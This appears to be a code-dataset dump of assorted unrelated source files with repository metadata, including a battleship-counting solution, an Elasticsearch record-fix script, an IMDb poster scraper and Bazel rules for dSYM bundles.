] | 13 | 2020-06-28T08:13:28.000Z | 2021-12-28T00:11:56.000Z | class AuxPowMixin(object):
AUXPOW_START_HEIGHT = 0
AUXPOW_CHAIN_ID = 0x0001
BLOCK_VERSION_AUXPOW_BIT = 0
@classmethod
def is_auxpow_active(cls, header) -> bool:
height_allows_auxpow = header['block_height'] >= cls.AUXPOW_START_HEIGHT
version_allows_auxpow = header['version'] & cls.BLOCK_VERSION_AUXPOW_BIT
return height_allows_auxpow and version_allows_auxpow | 40.6 | 80 | 0.743842 | 52 | 406 | 5.365385 | 0.442308 | 0.172043 | 0.121864 | 0.150538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021212 | 0.187192 | 406 | 10 | 81 | 40.6 | 0.824242 | 0 | 0 | 0 | 0 | 0 | 0.046683 | 0 | 0 | 0 | 0.014742 | 0 | 0 | 1 | 0.111111 | false | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
df1524fa7728c1adb3ef0c319a786a66845f1e94 | 159 | py | Python | Problems/dicecup.py | rikgj/Kattis | 2e34dee307aef5acea5837732bf9f27f8c548e9c | [
"MIT"
] | null | null | null | Problems/dicecup.py | rikgj/Kattis | 2e34dee307aef5acea5837732bf9f27f8c548e9c | [
"MIT"
] | null | null | null | Problems/dicecup.py | rikgj/Kattis | 2e34dee307aef5acea5837732bf9f27f8c548e9c | [
"MIT"
] | null | null | null | from sys import stdin
a,b = [int(x) for x in stdin.readline().split(' ')]
diff = abs(a-b) +1
a = min(a,b) +1
print(a)
for x in range(1,diff):
print(a+x)
| 15.9 | 51 | 0.591195 | 35 | 159 | 2.685714 | 0.514286 | 0.06383 | 0.12766 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023622 | 0.201258 | 159 | 9 | 52 | 17.666667 | 0.716535 | 0 | 0 | 0 | 0 | 0 | 0.006289 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0.285714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df1fe7022c513f9daa84d71c86c0ba7d7afec1ce | 1,396 | py | Python | fdrtd/builtins/util/kvstorage.py | chart21/fdrtd | c5f8ba84f8e367580572f2759683dfd3789b0b80 | [
"MIT"
] | null | null | null | fdrtd/builtins/util/kvstorage.py | chart21/fdrtd | c5f8ba84f8e367580572f2759683dfd3789b0b80 | [
"MIT"
] | 10 | 2021-08-29T00:03:36.000Z | 2022-02-18T09:19:38.000Z | fdrtd/builtins/util/kvstorage.py | chart21/fdrtd | c5f8ba84f8e367580572f2759683dfd3789b0b80 | [
"MIT"
] | 2 | 2021-08-28T21:44:10.000Z | 2021-12-16T23:23:58.000Z | """
contains microservice KeyValueStorage
"""
import uuid as _uuid
from fdrtd.server.microservice import Microservice
class KeyValueStorage(Microservice):
"""stores and retrieves values by key"""
def __init__(self, bus, endpoint):
super().__init__(bus, endpoint)
self.storages = {'default': {}}
def create(self, value, storage='default'):
"""create a storage; store value, return key"""
if storage not in self.storages:
self.storages[storage] = {}
uuid = str(_uuid.uuid4())
callback = {'uuid': uuid, 'storage': storage}
self.store(value, callback)
return self.callback(callback)
def store(self, value, callback):
"""store value, return key"""
kvstorage = self.storages[callback['storage']]
kvstorage[callback['uuid']] = value
def retrieve(self, callback):
"""retrieve value from storage"""
kvstorage = self.storages[callback['storage']]
value = kvstorage[callback['uuid']]
return value
def exists(self, callback):
"""return true if key exists in storage"""
kvstorage = self.storages[callback['storage']]
return callback['uuid'] in kvstorage
def delete(self, callback):
"""delete key from storage"""
kvstorage = self.storages[callback['storage']]
del kvstorage[callback['uuid']]
| 30.347826 | 55 | 0.626791 | 148 | 1,396 | 5.844595 | 0.283784 | 0.09711 | 0.09711 | 0.134104 | 0.2 | 0.158382 | 0.108671 | 0 | 0 | 0 | 0 | 0.000946 | 0.242837 | 1,396 | 45 | 56 | 31.022222 | 0.817408 | 0.162607 | 0 | 0.153846 | 0 | 0 | 0.061008 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.230769 | false | 0 | 0.076923 | 0 | 0.461538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df2437ca766dc3a07e7da531239e5dd32c32401c | 1,773 | py | Python | gracc-oneoffs/remove-odd-procs/remove-odd-procs.py | opensciencegrid/gracc-tools | 86297d0a8b6b208b6c661473647fdc69f438afec | [
"Apache-2.0"
] | null | null | null | gracc-oneoffs/remove-odd-procs/remove-odd-procs.py | opensciencegrid/gracc-tools | 86297d0a8b6b208b6c661473647fdc69f438afec | [
"Apache-2.0"
] | 1 | 2017-06-17T19:25:51.000Z | 2017-06-19T15:33:22.000Z | gracc-oneoffs/remove-odd-procs/remove-odd-procs.py | opensciencegrid/gracc-tools | 86297d0a8b6b208b6c661473647fdc69f438afec | [
"Apache-2.0"
] | 2 | 2017-06-16T20:07:38.000Z | 2017-06-17T15:03:18.000Z | #!/usr/bin/python
import elasticsearch
from elasticsearch_dsl import Search, A, Q
#import logging
import sys
import os
#logging.basicConfig(level=logging.WARN)
#es = elasticsearch.Elasticsearch(
# ['https://gracc.opensciencegrid.org/q'],
# timeout=300, use_ssl=True, verify_certs=False)
es = elasticsearch.Elasticsearch(
['localhost:9200'],
timeout=300)
osg_raw_index = 'gracc.osg.raw-*'
s = Search(using=es, index=osg_raw_index)
# Match the records by ProbeName and processors = 0.
s = s.query("match", ProbeName="htcondor-ce:hosted-ce18.grid.uchicago.edu")
s = s.query("match", Processors=0)
s = s.filter('range', EndTime={'from': 'now-12M', 'to': 'now'})
response = s.execute()
print "Query took %i milliseconds" % response.took
print "Query got %i hits" % response.hits.total
#update_id = "8c5816978fee6fc17718bcf81350d1f4"
#print "About to update record with id: %s" % update_id
#es.update(index="gracc.osg.raw3-2017.07", doc_type='JobUsageRecord', id=update_id, body={'doc': {'VOName': 'UserSchool2017'}})
update_buffer = []
for hit in s.scan():
    # Calculate the new CoreHours (cores = 1):
    core_hours = hit.WallDuration / 3600.0
    updated_doc = {
        "doc": {
            "CoreHours": core_hours,
            "Processors": 1
        },
        "_index": hit.meta.index,
        "_id": hit.meta.id,
        "_type": hit.meta.doc_type,
        "_op_type": "update"
    }
    update_buffer.append(updated_doc)
    print "Update %s" % updated_doc
    if len(update_buffer) > 200:
        elasticsearch.helpers.bulk(es, update_buffer)
        update_buffer = []
elasticsearch.helpers.bulk(es, update_buffer)
#es.update(index=hit.meta.index, doc_type=hit.meta.doc_type, id=hit.meta.id, body={'doc': updated_doc})
| 30.568966 | 128 | 0.667795 | 237 | 1,773 | 4.864979 | 0.443038 | 0.062446 | 0.048569 | 0.02255 | 0.097138 | 0.065915 | 0 | 0 | 0 | 0 | 0 | 0.039972 | 0.181613 | 1,773 | 57 | 129 | 31.105263 | 0.754652 | 0.35251 | 0 | 0.117647 | 0 | 0 | 0.178697 | 0.036092 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.117647 | null | null | 0.088235 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
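The scan loop above buffers update actions and flushes them once more than 200 have accumulated, plus a final flush for the remainder. A dependency-free sketch of that buffer-and-flush pattern (flush() here is just a stand-in for elasticsearch.helpers.bulk):

def flush(batch):
    # stand-in for elasticsearch.helpers.bulk(es, batch)
    print("flushing %d actions" % len(batch))

buffer = []
for doc_id in range(450):          # pretend these are hits from s.scan()
    buffer.append({"_id": doc_id, "_op_type": "update"})
    if len(buffer) > 200:
        flush(buffer)
        buffer = []
flush(buffer)                       # flush whatever is left over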
df2507bcc55adf702b1c6993e0b76f7f643ef8d6 | 849 | py | Python | Hasoc/create_folds.py | tezike/Hasoc | b29c5ec877a1751b04f86227a6ad264be8c06d81 | [
"Apache-2.0"
] | 1 | 2020-11-24T07:48:55.000Z | 2020-11-24T07:48:55.000Z | Hasoc/create_folds.py | tezike/Hasoc | b29c5ec877a1751b04f86227a6ad264be8c06d81 | [
"Apache-2.0"
] | null | null | null | Hasoc/create_folds.py | tezike/Hasoc | b29c5ec877a1751b04f86227a6ad264be8c06d81 | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: nbs/create_folds.ipynb (unless otherwise specified).
__all__ = ['df', 'df', 'y', 'kf', 'df', 'y']
# Cell
import os
import pandas as pd
from sklearn.model_selection import StratifiedKFold

SEED = 42  # note: SEED is used below but never defined in this notebook export; 42 is an assumed placeholder value
# Cell
df = pd.read_csv(os.path.join('../data', 'en_task_a', 'hasoc_2020_en_train_new.csv'), sep='\t')
# Cell
df['kfold_task1'] = -1
df['kfold_task2'] = -1
df = df.sample(frac=1.,random_state=SEED).reset_index(drop=True)
y = df['task1'].values
kf = StratifiedKFold(n_splits=5)
for fold,(t_,v_) in enumerate(kf.split(X=df,y=y)):
    df.loc[v_,'kfold_task1'] = fold
df = df.sample(frac=1.,random_state=SEED).reset_index(drop=True)
y = df['task2'].values
for fold,(t_,v_) in enumerate(kf.split(X=df,y=y)):
    df.loc[v_,'kfold_task2'] = fold
# Cell
df.to_csv(os.path.join('..', 'data', 'fold_df.csv'), index=False) | 29.275862 | 96 | 0.684335 | 149 | 849 | 3.697987 | 0.456376 | 0.021779 | 0.032668 | 0.047187 | 0.402904 | 0.341198 | 0.341198 | 0.341198 | 0.341198 | 0.341198 | 0 | 0.019947 | 0.114252 | 849 | 29 | 97 | 29.275862 | 0.712766 | 0.134276 | 0 | 0.235294 | 1 | 0 | 0.172603 | 0.036986 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.176471 | 0 | 0.176471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
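A self-contained illustration of the same fold-assignment idea on synthetic data (the column and label names here are made up for the example, not taken from the Hasoc dataset):

import pandas as pd
from sklearn.model_selection import StratifiedKFold

data = pd.DataFrame({'text': ['sample %d' % i for i in range(10)],
                     'label': [0, 1] * 5})
data['kfold'] = -1
skf = StratifiedKFold(n_splits=5)
for fold, (_, valid_idx) in enumerate(skf.split(X=data, y=data['label'])):
    data.loc[valid_idx, 'kfold'] = fold      # each row is tagged with the fold where it is held out
print(data['kfold'].value_counts())          # two rows per fold, one of each class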
df2f4471a03807c5058e593384972868df67d33c | 709 | py | Python | taller_estructuras_de_control/codigo_python_ejercicios/ejercicio_9.py | JMosqueraM/algoritmos_y_programacion | 30dc179b976f1db24401b110496250fbcb98938e | [
"MIT"
] | null | null | null | taller_estructuras_de_control/codigo_python_ejercicios/ejercicio_9.py | JMosqueraM/algoritmos_y_programacion | 30dc179b976f1db24401b110496250fbcb98938e | [
"MIT"
] | null | null | null | taller_estructuras_de_control/codigo_python_ejercicios/ejercicio_9.py | JMosqueraM/algoritmos_y_programacion | 30dc179b976f1db24401b110496250fbcb98938e | [
"MIT"
] | null | null | null | # Calculate a worker's net salary from the number of hours worked, the price per hour,
# and a fixed 20% tax deduction applied to the base salary
horas = float(input("Ingrese el numero de horas trabajadas: "))
precio_hora = float(input("Ingrese el precio por hora trabajada: "))
sueldo_base = float(input("Ingrese el valor del sueldo base: "))
pago_hora = horas * precio_hora
impuesto = 0.2
salario_neto = pago_hora + (sueldo_base * (1 - impuesto))  # the 20% tax is deducted from the base salary only
print(f"Si el trabajador tiene un sueldo base de {sueldo_base}$ (al cual se le descuenta un 20% por impuestos), trabaja {horas} horas, y la hora se le paga a {precio_hora}$.")
print(f"El salario neto del trabajador es de {salario_neto}$") | 59.083333 | 175 | 0.753173 | 121 | 709 | 4.330579 | 0.404959 | 0.114504 | 0.097328 | 0.108779 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0134 | 0.157969 | 709 | 12 | 176 | 59.083333 | 0.864322 | 0.244006 | 0 | 0 | 0 | 0.125 | 0.613084 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df321ec897b131393422f40ec400fe5025edb45a | 3,189 | py | Python | cs15211/BattleshipsInABoard.py | JulyKikuAkita/PythonPrac | 0ba027d9b8bc7c80bc89ce2da3543ce7a49a403c | [
"Apache-2.0"
] | 1 | 2021-07-05T01:53:30.000Z | 2021-07-05T01:53:30.000Z | cs15211/BattleshipsInABoard.py | JulyKikuAkita/PythonPrac | 0ba027d9b8bc7c80bc89ce2da3543ce7a49a403c | [
"Apache-2.0"
] | null | null | null | cs15211/BattleshipsInABoard.py | JulyKikuAkita/PythonPrac | 0ba027d9b8bc7c80bc89ce2da3543ce7a49a403c | [
"Apache-2.0"
] | 1 | 2018-01-08T07:14:08.000Z | 2018-01-08T07:14:08.000Z | __source__ = 'https://github.com/kamyu104/LeetCode/blob/master/Python/battleships-in-a-board.py'
# Time: O(m * n)
# Space: O(1)
#
#
# Description: 419. Battleships in a Board
#
# Given an 2D board, count how many different battleships are in it.
# The battleships are represented with 'X's, empty slots are represented with '.'s.
# You may assume the following rules:
#
# You receive a valid board, made of only battleships or empty slots.
# Battleships can only be placed horizontally or vertically. In other words,
# they can only be made of the shape 1xN (1 row, N columns) or Nx1 (N rows, 1 column),
# where N can be of any size.
# At least one horizontal or vertical cell separates between two battleships -
# there are no adjacent battleships.
#
# Example:
# X..X
# ...X
# ...X
# In the above board there are 2 battleships.
# Invalid Example:
# ...X
# XXXX
# ...X
# This is not a valid board - as battleships will always have a cell separating between them.
# Your algorithm should not modify the value of the board.
# Follow up:
# Could you do it in one-pass, using only O(1) extra memory and without modifying the value of the board?
#
# Hide Company Tags Microsoft
import unittest
# 32ms 94.99%
class Solution(object):
    def countBattleships(self, board):
        """
        :type board: List[List[str]]
        :rtype: int
        """
        if not board or not board[0]:
            return 0
        cnt = 0
        for i in xrange(len(board)):
            for j in xrange(len(board[0])):
                cnt += int(board[i][j] == 'X' and \
                           (i == 0 or board[i - 1][j] != 'X') and \
                           (j == 0 or board[i][j - 1] != 'X'))
        return cnt

class TestMethods(unittest.TestCase):
    def test_Local(self):
        self.assertEqual(1, 1)

if __name__ == '__main__':
    unittest.main()
Java = '''
#Thought:
Going over all cells, we can count only those that are the "first" cell of the battleship.
First cell will be defined as the most top-left cell. We can check for first cells by only counting cells
that do not have an 'X' to the left and do not have an 'X' above them.
#2ms 100%
class Solution {
    public int countBattleships(char[][] board) {
        if (board == null || board.length == 0) return 0;
        int m = board.length, n = board[0].length;
        int count = 0;
        for (int i = 0; i < m ;i++) {
            for (int j = 0; j < n; j++) {
                if (board[i][j] == '.') continue;
                if (i > 0 && board[i-1][j] == 'X') continue;
                if (j > 0 && board[i][j-1] == 'X') continue;
                count++;
            }
        }
        return count;
    }

    public int countBattleships2(char[][] board) {
        if (board == null || board.length == 0 || board[0].length == 0) return 0;
        int R = board.length, C = board[0].length, cnt = 0;
        for (int i = 0; i < R; i++) {
            for (int j = 0; j < C; j++) {
                if (board[i][j] == 'X'
                    && (i == 0 || board[i - 1][j] == '.')
                    && (j == 0 || board[i][j - 1] == '.'))
                    cnt++;
            }
        }
        return cnt;
    }
}
''' | 31.574257 | 105 | 0.558169 | 466 | 3,189 | 3.791845 | 0.373391 | 0.03056 | 0.023769 | 0.013582 | 0.153367 | 0.081494 | 0.03622 | 0.03622 | 0 | 0 | 0 | 0.025792 | 0.306993 | 3,189 | 101 | 106 | 31.574257 | 0.773756 | 0.334588 | 0 | 0 | 0 | 0.092593 | 0.690141 | 0.024769 | 0 | 0 | 0 | 0 | 0.018519 | 1 | 0.037037 | false | 0 | 0.018519 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df3715d9a9064f79f11dad87ba56f6a3d27743a1 | 289 | py | Python | tests/test_wrong_url.py | alexella1/python-ascii_magic | df189da5dc59d4cd6f6fe003a75c99539247851f | [
"MIT"
] | null | null | null | tests/test_wrong_url.py | alexella1/python-ascii_magic | df189da5dc59d4cd6f6fe003a75c99539247851f | [
"MIT"
] | null | null | null | tests/test_wrong_url.py | alexella1/python-ascii_magic | df189da5dc59d4cd6f6fe003a75c99539247851f | [
"MIT"
] | null | null | null | from context import ascii_magic
try:
    output = ascii_magic.from_url('https://wow.zamimg.com/uploads/blog/images/20516-afterlives-ardenweald-4k-desktop-wallpapers.jpg')
    ascii_magic.to_terminal(output)
except OSError as e:
print(f'Could not load the image, server said: {e.code} {e.msg}') | 41.285714 | 130 | 0.782007 | 47 | 289 | 4.702128 | 0.829787 | 0.135747 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022727 | 0.086505 | 289 | 7 | 131 | 41.285714 | 0.814394 | 0 | 0 | 0 | 0 | 0.166667 | 0.52069 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df38488be49b126da2ba8c4b38d9a97d5b60ae28 | 2,706 | py | Python | book/code/imdb - project4+5 scrape popular film list and poster.py | marcus-pham/test | bcbc7c34a672ae6c7e9bdc811934c4003134ae0d | [
"MIT"
] | null | null | null | book/code/imdb - project4+5 scrape popular film list and poster.py | marcus-pham/test | bcbc7c34a672ae6c7e9bdc811934c4003134ae0d | [
"MIT"
] | null | null | null | book/code/imdb - project4+5 scrape popular film list and poster.py | marcus-pham/test | bcbc7c34a672ae6c7e9bdc811934c4003134ae0d | [
"MIT"
] | null | null | null | from bs4 import BeautifulSoup
from selenium import webdriver
import requests
import time
class Film(object):
"""docstring for film"""
def __init__(self):
self.title = ""
self.rank = ""
self.year_of_production = ""
self.link = ""
def create_phantom_driver():
    driver = webdriver.PhantomJS(executable_path = r'C:\phantomjs-2.1.1-windows\bin\phantomjs.exe')
    return driver
def get_popular_film_list(url):
    driver = create_phantom_driver()
    # url = 'http://www.imdb.com/chart/top?ref_=nv_mv_250_6'
    # download html
    driver.get(url)
    # print driver.page_source
    # create soup
    soup = BeautifulSoup(driver.page_source,'lxml')
    # soup = BeautifulSoup(open('imdb.html'),'lxml')
    # search
    table = soup.find('table',class_='chart')
    film_list = []
    for td in table.find_all('td',class_='titleColumn'):
        a = td.find('a')
        # print a['href']
        new_film = Film()
        full_des = td.text.strip().replace('\n','')
        # print full_des
        title = full_des.split('(')[0]
        # print title
        year = full_des.split('(')[1][:4]
        # print year
        start_rank = full_des.find(')')
        end_rank = full_des.find('(',start_rank,len(full_des))
        rank = full_des[start_rank+1:end_rank]
        # print rank
        new_film.rank = rank
        new_film.title = title
        new_film.year_of_production = year
        new_film.link = a['href'].strip()
        film_list.append(new_film)
    driver.quit()
    for film in film_list:
        print film.title
        print film.rank
        print film.year_of_production
        print film.link
        print "\n"
    return film_list
# when ever we have the film list
def poster_scrap(film_list):
    driver = create_phantom_driver()
    for film in film_list:
        url = 'http://www.imdb.com' + film.link
        print film.title
        driver.get(url)
        soup = BeautifulSoup(driver.page_source, 'lxml')
        div = soup.find('div', class_='poster')
        # find the link leading to the poster image
        a = div.find('a')
        # link to download the poster image
        poster_url = 'http://www.imdb.com' + a['href']
        print poster_url
        driver.get(poster_url)
        soup = BeautifulSoup(driver.page_source, 'lxml')
        # print soup.prettify()
        divs = soup.find_all('div',class_='pswp__zoom-wrap')
        try:
            imgs = divs[1].find_all('img')
            download_link = imgs[1]['src']
            print download_link
        except Exception, e:
            imgs = divs[0].find_all('img')
            download_link = imgs[1]['src']
            print download_link
        f = open('{0}.jpg'.format(film.title.encode('utf8').replace(':','')),'wb')
        f.write(requests.get(download_link).content)
        # time.sleep(2)
        f.close()
    driver.quit()
# url for current popular and hot film
url = 'http://www.imdb.com/chart/moviemeter/?ref_=nv_mv_mpm_7'
# get_popular_film_list(url)
poster_scrap(get_popular_film_list(url))
| 20.5 | 96 | 0.682927 | 409 | 2,706 | 4.315403 | 0.298289 | 0.045326 | 0.024929 | 0.031728 | 0.218697 | 0.144476 | 0.098584 | 0.053258 | 0.053258 | 0.053258 | 0 | 0.008873 | 0.167036 | 2,706 | 131 | 97 | 20.656489 | 0.774179 | 0.15558 | 0 | 0.246377 | 0 | 0 | 0.107939 | 0.019625 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.057971 | null | null | 0.130435 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
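The scraping functions above revolve around BeautifulSoup's find/find_all with CSS classes. Here is a self-contained illustration against an inline HTML snippet instead of a live Selenium page (the snippet is invented for the example; 'html.parser' is used to avoid the lxml dependency):

from bs4 import BeautifulSoup

html = """
<table class="chart">
  <tr><td class="titleColumn"><a href="/title/tt1/">Film One</a> (2019)</td></tr>
  <tr><td class="titleColumn"><a href="/title/tt2/">Film Two</a> (2020)</td></tr>
</table>
"""
soup = BeautifulSoup(html, 'html.parser')
table = soup.find('table', class_='chart')
for td in table.find_all('td', class_='titleColumn'):
    link = td.find('a')
    print(link.text, link['href'])   # -> "Film One /title/tt1/", "Film Two /title/tt2/"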
df4060697a7eb303c5884fc6599a1897ddcbd97e | 4,264 | bzl | Python | apple/bundling/debug_symbol_actions.bzl | kastiglione/rules_apple | 3745c3f03b9d29a04671fd4fac96468ca7031fd6 | [
"Apache-2.0"
] | 2 | 2019-09-01T06:06:40.000Z | 2020-11-10T00:37:01.000Z | apple/bundling/debug_symbol_actions.bzl | c-parsons/rules_apple | f75c4b1be219cb32704d900bd1a42ab200eab445 | [
"Apache-2.0"
] | null | null | null | apple/bundling/debug_symbol_actions.bzl | c-parsons/rules_apple | f75c4b1be219cb32704d900bd1a42ab200eab445 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Actions to manipulate debug symbol outputs."""
load("@build_bazel_rules_apple//apple/bundling:file_actions.bzl", "file_actions")
def _collect_linkmaps(ctx, debug_outputs, bundle_name):
"""Collects the available linkmaps from the binary.
Args:
ctx: The current context.
debug_outputs: dSYM bundle binary provider.
bundle_name: Anticipated name of the dSYM bundle.
Returns:
A list of linkmap files, one per linked architecture.
"""
outputs = []
actions = ctx.actions
# TODO(b/36174487): Iterate over .items() once the Map/dict problem is fixed.
for arch in debug_outputs.outputs_map:
arch_outputs = debug_outputs.outputs_map[arch]
linkmap = arch_outputs["linkmap"]
out_linkmap = actions.declare_file("%s_%s.linkmap" % (bundle_name, arch))
outputs.append(out_linkmap)
file_actions.symlink(ctx, linkmap, out_linkmap)
return outputs
def _create_symbol_bundle(ctx, debug_outputs, bundle_name, bundle_extension = ""):
"""Creates the .dSYM bundle next to the output archive.
The generated bundle will have the same name as the bundle being built
(including its extension), but with the ".dSYM" extension appended to it.
If the target being built does not have a binary or if the build it not
generating debug symbols (`--apple_generate_dsym` is not provided), then this
function is a no-op that returns an empty list.
This function assumes that the target has a user-provided binary in the
`binary` attribute. It is the responsibility of the caller to check this.
Args:
ctx: The Skylark context.
debug_outputs: dSYM bundle binary provider.
bundle_name: Anticipated name of the dSYM bundle.
bundle_extension: Anticipated extension of the dSYM bundle, empty string if
it does not have one.
Returns:
A list of files that comprise the .dSYM bundle, which should be returned as
additional outputs from the rule.
"""
dsym_bundle_name = bundle_name + bundle_extension + ".dSYM"
outputs = []
actions = ctx.actions
# TODO(b/36174487): Iterate over .items() once the Map/dict problem is fixed.
for arch in debug_outputs.outputs_map:
arch_outputs = debug_outputs.outputs_map[arch]
dsym_binary = arch_outputs["dsym_binary"]
out_symbols = actions.declare_file("%s/Contents/Resources/DWARF/%s_%s" % (
dsym_bundle_name,
bundle_name,
arch,
))
outputs.append(out_symbols)
file_actions.symlink(ctx, dsym_binary, out_symbols)
# If we found any outputs, create the Info.plist for the bundle as well;
# otherwise, we just return the empty list. The plist generated by dsymutil
# only varies based on the bundle name, so we regenerate it here rather than
# propagate the other one from the apple_binary. (See
# https://github.com/llvm-mirror/llvm/blob/master/tools/dsymutil/dsymutil.cpp)
if outputs:
out_plist = actions.declare_file("%s/Contents/Info.plist" %
dsym_bundle_name)
outputs.append(out_plist)
actions.expand_template(
template = ctx.file._dsym_info_plist_template,
output = out_plist,
substitutions = {
"%bundle_name_with_extension%": bundle_name + bundle_extension,
},
)
return outputs
# Define the loadable module that lists the exported symbols in this file.
debug_symbol_actions = struct(
    collect_linkmaps = _collect_linkmaps,
    create_symbol_bundle = _create_symbol_bundle,
)
| 39.481481 | 82 | 0.695826 | 579 | 4,264 | 4.979275 | 0.352332 | 0.045092 | 0.022546 | 0.030524 | 0.231009 | 0.181755 | 0.160943 | 0.160943 | 0.160943 | 0.160943 | 0 | 0.007324 | 0.231473 | 4,264 | 107 | 83 | 39.850467 | 0.872444 | 0.554409 | 0 | 0.243902 | 0 | 0 | 0.106455 | 0.079275 | 0 | 0 | 0 | 0.018692 | 0 | 1 | 0.04878 | false | 0 | 0 | 0 | 0.097561 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df4381be0a6af61c9a8d19296067917654a1c8b3 | 3,958 | py | Python | ipyannotator/ipytyping/annotations.py | itepifanio/ipyannotator | eac99f71d8d39e02a10c21807508b0c064077806 | [
"Apache-2.0"
] | null | null | null | ipyannotator/ipytyping/annotations.py | itepifanio/ipyannotator | eac99f71d8d39e02a10c21807508b0c064077806 | [
"Apache-2.0"
] | null | null | null | ipyannotator/ipytyping/annotations.py | itepifanio/ipyannotator | eac99f71d8d39e02a10c21807508b0c064077806 | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: nbs/00c_annotation_types.ipynb (unless otherwise specified).
__all__ = []
# Internal Cell
from pathlib import Path
from collections.abc import MutableMapping
from typing import Dict, Optional, Iterable, Any, Union
from ipywidgets import Layout
from ..mltypes import OutputImageLabel, OutputLabel
from ..custom_input.buttons import ImageButton, ImageButtonSetting, ActionButton
# Internal Cell
class AnnotationStore(MutableMapping):
    def __init__(self, annotations: Optional[Dict] = None):
        self._annotations = annotations or {}

    def __getitem__(self, key: str):
        return self._annotations[key]

    def __delitem__(self, key: str):
        if key in self:
            del self._annotations[key]

    def __setitem__(self, key: str, value: Any):
        self._annotations[key] = value

    def __iter__(self):
        return iter(self._annotations)

    def __len__(self):
        return len(self._annotations)

    def __repr__(self):
        return "{}({!r})".format(self.__class__.__name__, self._annotations)

# Internal Cell
class LabelStore(AnnotationStore):
    def __getitem__(self, key: str):
        assert isinstance(key, str)
        return self._annotations[key]

    def __delitem__(self, key: str):
        assert isinstance(key, str)
        if key in self:
            del self._annotations[key]

    def __setitem__(self, key: str, value: Optional[Dict[str, bool]]):
        assert isinstance(key, str)
        if value:
            assert isinstance(value, dict)
        self._annotations[key] = value
# Internal Cell
def _label_store_to_image_button(
    annotation: LabelStore,
    width: int = 150,
